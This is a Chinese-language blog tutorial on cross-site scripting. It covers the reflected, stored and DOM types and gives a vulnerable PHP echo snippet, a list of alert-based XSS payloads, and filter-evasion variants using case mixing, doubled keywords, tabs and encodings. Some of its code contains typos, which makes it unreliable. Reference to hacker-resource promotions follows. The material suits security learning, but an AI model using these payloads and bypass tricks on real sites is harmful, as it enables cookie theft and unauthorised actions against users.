XSS漏洞及其原理(非常详细)零基础入门到精通,收藏这篇就够了

于 2025-08-03 08:15:00 发布
阅读量601 收藏 14
点赞数 12
CC 4.0 BY-SA版权
分类专栏: 程序员 计算机 网络安全 文章标签: xss 网络 前端
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Python_0011/article/details/149840241
文章目录
  • 前言
  • 一、XSS漏洞原理
    • 1.概述
    • 2.利用方式
    • 3.执行方式
    • 4.攻击对象
    • 5.XSS危害
      • (1)窃取cookie
      • (2)未授权操作
      • (3)传播蠕虫病毒
    • 6.简单代码
    • 7.XSS验证
    • 8.
  • 二、XSS漏洞分类
    • 1.反射型XSS
      • 原理
      • 特点
        • 举个栗子:
    • 2.存储型XSS
      • 原理
      • 特点
    • 3.DOM型XSS
      • 原理
      • 特点
      • 举个栗子
      • 栗子一
      • 栗子二
      • 简单利用
  • 三、XSS payload及变形
    • 1.payload构造
      • (1)利用伪协议(HTML标签的属性值)
      • (2)利用事件
      • (3)利用CSS (只做了解)
      • (4)利用【<>】构造HTML标签和标签
    • 2.payload变形
      • (1)大小写
      • (2)双关键字
      • (3)【/】代替空格
      • (4)引号
      • (5)Tab与回车
      • (6)编码
  • 总结

前言

一、XSS漏洞原理

1.概述

XSS被称为跨站脚本攻击(Cross Site Scripting),由于和层叠样式表(Cascading Style Sheets,CSS)重名,改为XSS。

主要基于JavaScript语言进行恶意攻击,因为js非常灵活操作html、css、浏览器。

2.利用方式

利用网页开发时web应用程序对用户输入过滤不足导致将恶意代码注入到网页中,使用户浏览器加载并执行恶意代码,通常是JavaScript类型,也包括java、vbs、flash、html等。

3.执行方式

用户浏览被XSS注入过的网页,浏览器就会解析这段代码,就被攻击了。因为浏览器当中有JavaScript解析器,浏览器不会判断代码是否恶意,只要符合语法规则,就直接解析了。

4.攻击对象

客户端攻击,对象大多为用户,网站管理员。
还有微博,网页留言板,聊天室等收集用户输入的地方。

5.XSS危害

(1)窃取cookie

因为大部分人喜欢将密码储存到浏览器当中,所以黑客一般渗透的时候就会先来浏览器查看已保存的cookie 来盗取各种用户账号

前面文章也提到预防xss一种方法 (传送门)

(2)未授权操作

js特性很强大,黑客会直接代替用户在html进行各类操作。比如劫持会话,刷流量,执行弹窗广告,还能记录用户的键盘输入。

(3)传播蠕虫病毒

6.简单代码

<?php
$input = $_GET["XSS"];
etho "<div>".$input."</div>";
?>

7.XSS验证

当在测试页面上提交以下代码,浏览器执行之后会出现弹窗,这是为了验证js代码是否被执行,代码被当做字符串输出在HTML页面上,浏览器当中的JavaScript解析器会根据

<script>alert(/xss/)</script>           #比较常用
<script>confirm('xss')</script>
<script>prompt("xss")</script>

8.

二、XSS漏洞分类

1.反射型XSS

非持久型XSS,最容易出现的XSS漏洞。

原理

用户在请求某个URL地址时,会携带一部分数据。当客户端进行访问某条链接时,攻击者可以将恶意代码注入到URL,如果服务器端未对URL携带的参数做判断和过滤,直接返回响应页面,那么XSS攻击代码就会被一起传输到用户的浏览器,触发反射型XSS。

特点

非持久性
参数脚本
js代码在web应用的参数当中:搜索框

数据流量:浏览器---->后端---->浏览器

举个栗子:

当用户进行搜索时,返回结果通常包括用户的原始搜索内容,如果攻击者精心构造包含XSS恶意代码的链接,诱导用户点击并成功执行,用户的信息就被窃取了,甚至还可以模拟用户进行一些操作。

利用URL编码来迷惑
在这里插入图片描述
生成短网址,用来掩饰,造成迷惑。
在这里插入图片描述

2.存储型XSS

原理

被保存到服务器上,显示到HTML页面中,经常出现在用户评论的页面,攻击者将XSS代码保存到数据库中,当用户在此访问这个页面时,就会触发并执行XSS代码,窃取用户的敏感信息。

特点

危害性最大:持久的保存在服务器上
持久型XSS
js代码不在某个参数中,而是被写进了数据库或文件可以永久保存数据的介质中,如留言板等。

数据流量走向:浏览器—>后端—>数据库—>后端—>浏览器

3.DOM型XSS

首先什么是DOM? 什么又是DOM树?
移步
全称 文档对象模型(Document Object Model)

原理

基于文档对象模型(DOM)的一种漏洞。这种XSS与反射型XSS、存储型XSS有着本质的区别,它的攻击代码不需要服务器解析响应,触发XSS依靠浏览器端的DOM解析,客户端的JavaScript脚本可以访问浏览器的DOM并修改页面的内容,不依赖服务器的数据,直接从浏览器端获取数据并执行。

特点

非持久性

数据流量:URL—>浏览器

举个栗子

document,getElementByld(“x”).innerHTML、document.write
在这里插入图片描述

栗子一

恶意payload:

http://localhost/dom.php?name= <img src =1 οnerrοr=> 等号后面填alert(1) 【懂得都懂】
当访问访问以上地址时,服务器返回包含上面脚本的HTML静态脚本,浏览器会把HTML文本解析成DOM

语法:οnerrοr=“SomeJavaScriptCode”
SomeJavaScriptCode:必需。规定该事件发生时执行的JavaScript。
在这里插入图片描述

栗子二

在这里插入图片描述

简单利用
<script>
var text = document.getElementByld('private_msg').innerHTML;
alert(text);
</script>

在这里插入图片描述

三、XSS payload及变形

1.payload构造

(1)利用伪协议(HTML标签的属性值)
<a href="javascript:alert(/xss/)">touch me !< /a>


<img src="javascript:alert('xss')">   #需在IE6测试
(2)利用事件
<img src='./smile.jpg' onmouseover='alert(/xss/)'>


<input type="text" onclick="alert(/xss/)">
(3)利用CSS (只做了解)

行内样式

<div style="background-image:url(javascript:alert(/xss/))">

页内样式

<style>Body{background-image:url(javascript:alert(/xss/))}</style>
(4)利用【<>】构造HTML标签和标签
<h1 style="color:green;">XSS</h1>
<script>alert(/xss/)</script>

2.payload变形

(1)大小写
<iMg sRc='#'Onerror="alert(/xss/)"/>


<a hREf="javaScript:alert(/xss/)">click me </a>
(2)双关键字
<scrscript>alert(/xss/)</scrscript>
(3)【/】代替空格
<img/src='#'onerror='alert(/xss/)'/>
(4)引号

在js当中可以用反引号代替单双引号,在HTML中就不需要。

<img src="#"onerror="alert(/xss/)"/>
<img src='#'onerror='alert(/xss/)'/>
<img src=# onerror=alert(/xss/)/>
<img src="#"onerror=alert('xss')/>
<img src="#"onerror=alert'xss'/>
(5)Tab与回车

在一些位置添加Tab(水平制表符)和回车符来绕过关键字检测

<img src='#'onerror		='alert(/xss/)'/>
<a href="j	 avascript:alert(/xss/)">click me!</a>
<A href="j
avascript:alert(/xss/)">click me!</a>
(6)编码

URL编码
%3Cscript%3Ealert(/xss/)%3C/script%3E
HTML实体编码
a 97
(&#97) “7”后面还有美式分号“;”
&#61 “1”后面还有美式分号“;”

<a href="j&#97;v&#x61;script:alert(/xss/)">click me!</a>

总结

声明:本文所涉及到的仅用于学习交流使用,如有其他与本人无关

黑客/网络安全学习包

资料目录

  1. 成长路线图&学习规划

  2. 配套视频教程

  3. SRC&黑客文籍

  4. 护网行动资料

  5. 黑客必读书单

  6. 面试题合集

因篇幅有限,仅展示部分资料,需要点击下方链接即可前往获取

CSDN大礼包:《黑客&网络安全入门&进阶学习资源包》免费分享

1.成长路线图&学习规划

要学习一门新的技术,作为新手一定要先学习成长路线图方向不对,努力白费

对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图&学习规划。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。


因篇幅有限,仅展示部分资料,需要点击下方链接即可前往获取

CSDN大礼包:《黑客&网络安全入门&进阶学习资源包》免费分享

2.视频教程

很多朋友都不喜欢晦涩的文字,我也为大家准备了视频教程,其中一共有21个章节,每个章节都是当前板块的精华浓缩


因篇幅有限,仅展示部分资料,需要点击下方链接即可前往获取

CSDN大礼包:《黑客&网络安全入门&进阶学习资源包》免费分享

3.SRC&黑客文籍

大家最喜欢也是最关心的SRC技术文籍&黑客技术也有收录

SRC技术文籍:

黑客资料由于是敏感资源,这里不能直接展示哦!

4.护网行动资料

其中关于HW护网行动,也准备了对应的资料,这些内容可相当于比赛的金手指!

5.黑客必读书单

**

**

6.面试题合集

当你自学到这里,你就要开始思考找工作的事情了,而工作绕不开的就是真题和面试题。

更多内容为防止和谐,可以扫描获取~

因篇幅有限,仅展示部分资料,需要点击下方链接即可前往获取

CSDN大礼包:《黑客&网络安全入门&进阶学习资源包》免费分享

六、前端XSS——(3)DOM型XSS
weixin_45540609的博客
04-25 1061
一、DOM型XSS DOM(Document Object Model)是一个树形模型,可以编写JavaScript代码根据dom一层一层的节点,去遍历/获取/修改对应的节点、对象、值。DOM是一个JS可以操纵浏览器和网页显示内容的接口。 每个载入浏览器的HTML文档都会成为Documnet对象,Document对象使我们可以从脚本中队HTML页面中的所有元素进行访问 lastModified可以判断伪静态。 做dom型XSS一定要审计。 1.html ...
最新RAG知识库问答的应用(非常详细)从零基础入门精通收藏
A1_3_9_7的博客
06-05 935
在信息爆炸的时代,企业面临着如何有效获取和利用知识的问题。基于RAG(Retrieval-Augmented Generation)知识库问答的应用,正是解决这一挑战的重要手段。RAG结合了信息检索和文本生成的优势,能在海量数据中快速提取相关信息,并生成高质量的回答。本文将探讨RAG知识库问答的业务方案及其在垂直应用领域的潜力。
XSS漏洞学习笔记
qq_56426046的博客
08-28 1396
xss还是比较简单的一种web漏洞,还需要实战训练,后续更新实战的文章。加油。今天送给自己的话:今天的我们伤痕累累,但比起昨日,我们应该多少有所成长。
xss笔记
2301_79935671的博客
04-02 1217
XSS被称为跨站脚本攻击(Cross Site Scripting),由于和层叠样式表(Cascading Style Sheets,CSS)重名,改为XSS。主要基于JavaScript语言进行恶意攻击,因为js非常灵活操作html、css、浏览器。
网络安全】DVWA之XSS(DOM)攻击姿势及解题详析合集
等风来
05-16 1万+
标签用于在 HTML 页面中嵌入 JavaScript 脚本代码,通过在浏览器中执行这些脚本来实现一些与用户交互、数据处理、动态效果等相关的功能。1.通过 array_key_exists() 函数来判断 $_GET 超级全局变量中是否存在名为 default 的键,如果存在并且不为 null,则将其赋值给 $default 变量。语句中实现一个白名单机制,将可接受的语言作为取值,所有其他语言都会默认被转换为英语。在客户端被注释,因此注入语句不会被传入服务器端,从而达到注入效果。,则继续进行后续校验;
xss之dom类型
m0_74741186的博客
10-05 770
上我们的pikachu。
多模态大模型入门指南(非常详细零基础入门精通收藏这一
Hacker_doggy的博客
07-17 3571
如表1所示,对26 SOTA MM-LLMs的架构和训练数据集规模进行了全面比较。随后,简要介绍这些模型的核心贡献并总结了它们的发展趋势。代表了一系列视觉语言 (VL) 模型,旨在处理交错的视觉数据和文本,生成自由格式的文本作为输出。(2)BLIP-2引入了一个资源效率更高的框架,包括用于弥补模态差距的轻量级 Q-Former ,实现对冻结 LLMs 的充分利用。利用 LLMs,BLIP-2 可以使用自然语言提示进行零样本图像到文本的生成。(3)LLaVA。
【建议收藏】CTF网络安全夺旗赛刷题指南(非常详细零基础入门精通收藏这一
abao6690的博客
07-27 1902
【建议收藏】CTF网络安全夺旗赛刷题指南(非常详细零基础入门精通收藏这一
网络安全入门教程(非常详细)零基础入门精通,包含网络安全概述与基础知识与技能等章节内容,共36页,适合自学与教学使用
10-27
网络安全是现代信息技术不可或缺的一环,它涉及到技术、管理以及法律等多个方面,目的是保护计算机网络系统及其数据不受未授权的访问、攻击、破坏或篡改。网络安全的重要性随着互联网和数字化进程的快速发展而日益...
记一次北京某大学逻辑漏洞挖掘,从零基础精通收藏了!
最新发布
A1_3_9_7的博客
07-07 840
逻辑漏洞挖掘主打一个BP抓包,看请求包和请求返回包,分析包的代码,看有没有可以利用的参数,更改参数,不断尝试,去测试所有功能点,就会有意想不到的结果。
3-4Dom形XSS详解以及演示
山兔的博客
04-21 3672
学习DOM型XSS前,先搞清楚什么是DOM 通过 JavaScript,可以重构整个 HTML 文档。您可以添加、移除、改变或重排页面上的项目。 要改变页面的某个东西,JavaScript 就需要获得对HTML 文档中所有元素进行访问的入口。这个入口,连同对 HTML 元素进行添加、移动、改变或移除的方法和属性,都是通过文档对象模型来获得的(DOM)。 所以,你可以把DOM理解为一个可以访问HTML的标准编程接口。 举个栗子来理解一下DOM <html><head> <sc
XSS | DOM 型 XSS 攻击
Blue17 の 小窝
09-27 2315
在网站页面中有许多元素,当页面到达浏览器,浏览器会为页面创建一个顶级的 Document object 文档对象,接着生成各个子文档对象,每个页面元素对应一个文档对象,每个文档对象包含属性、方法和事件。DOM 型 XSS 程序只有 HTML 代码,并不存在服务器端代码,所以此程序并没有与服务器端进行交互,是一个纯粹的运行在客户端的 JavaScript 脚本代码触发的 XSS 漏洞。标签中是没有任何内容的,这符合了我们上面讲的 DOM 型 XSS,后端返回的数据包中不包含 XSS 攻击代码的特点。
XSS 漏洞学习
iO快到碗里来
08-10 737
XSS漏洞学习实战 XSS简介 XSS(Cross Site Scripting)攻击全称跨站脚本攻击,是为不和层叠样式表(Cascading Style Sheets, CSS)的缩写混淆,故将跨站脚本攻击缩写为XSSXSS是一种经常出现在web应用中的计算机安全漏洞,它允许恶意web用户将代码植入到提供给其它用户使用的页面中,当受害者访问这些页面时,浏览器会解析并执行这些恶意代码,从而达到窃取用户身份/钓鱼/传播恶意代码等行为。主要有三种类型:存储型XSS、反射型XSS(也叫做非持久性)、Dom型XS
终于弄懂了dom型xss和反射型xss的区别
dzqxwzoe的博客
03-05 893
***xss漏洞原理其实很简单,类型也分为三类,反射型、储存型和dom型。但是刚接触xss的时候我根本不理解什么是dom型xss,无法区分反射型和dom型,也很少遇见,现在通过这文章可以给新入坑的小白更好的理解xss漏洞,也通过这文章巩固一下我对xss的理解.
XSS大全
weixin_46601374的博客
03-01 8749
XSS原理和特性 xss:将用户的输入当作前端代码执行 注入攻击的本质,是把用户输入的数据当做代码执行。 这里有两个关键条件: 第一个是用户能控制输入 第二个是原本程序要执行的代码,拼接了用户输入的数据 html:定义了网页的结构 css:美化页面 js:可以操浏览器 XSS主要拼接的是什么 SQL注入拼接的是操作数据库的SQL语句。 XSS拼接的是网页的HTML代码,一般而言我们是可以拼接出合适的HTML代码去执行恶意的JS语句(总结:xss就是拼接恶意的HTML) xss
DVWA之DOM XSS(DOM型跨站脚本攻击)
谢公子的博客
10-03 2万+
目录 Low Medium High Impossible Low 源代码: &lt;?php # No protections, anything goes ?&gt; 从源代码可以看出,这里low级别的代码没有任何的保护性措施! 页面本意是叫我们选择默认的语言,但是对default参数没有进行任何的过滤 所以我们可以构造XSS代码,访问链接: http://127...
关于DOM型XSS漏洞的学习笔记
热门推荐
Mi1k7ea
03-05 4万+
DOM,全称Document Object Model,是一个平台和语言都中立的接口,可以使程序和脚本能动态访问和更新文档的内容、结构以及样式。 DOM型XSS其实是一种特殊类型的反射型XSS,它是基于DOM文档对象模型的一种漏洞。 在网站页面中有许多页面的元素,当页面到达浏览器时浏览器会为页面创建一个顶级的Document object文档对象,接着生成各个子文档对象,每个页面元素对应一个
Dom型XSS漏洞
希望我的博客,能帮上你解决学习中工作中所遇到的问题
05-28 843
Dom型XSS漏洞 原理:让原本不存在Xss的地方出现Xss,利用native编码去替换js语句,让前端认为这个js语句安全 我们首先在各个框框内插入 <script>alert(1)</script> 结果页面崩溃,再次访问发现 被拦截了,于是我们尝试绕过,在url栏输入/index.php/1.txt 成功绕过,继续输入 <script>alert(1)</script> 发现没有出现弹窗,可能不存在Xss漏洞 接着我发现,在URL栏上的传参和页面上
有关DOM XSS的一点思考
9ian1i
08-30 1438
前段时间发现了某站的一个DOM XSS漏洞,发到补天说无法复现,我开始琢磨其中的问题。我们首先大致还原一下场景:例子一:<!DOCTYPE html> <html> <head> <title>xss test</title> </head> <body> <div id="xss"> </div> </body> <sc
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值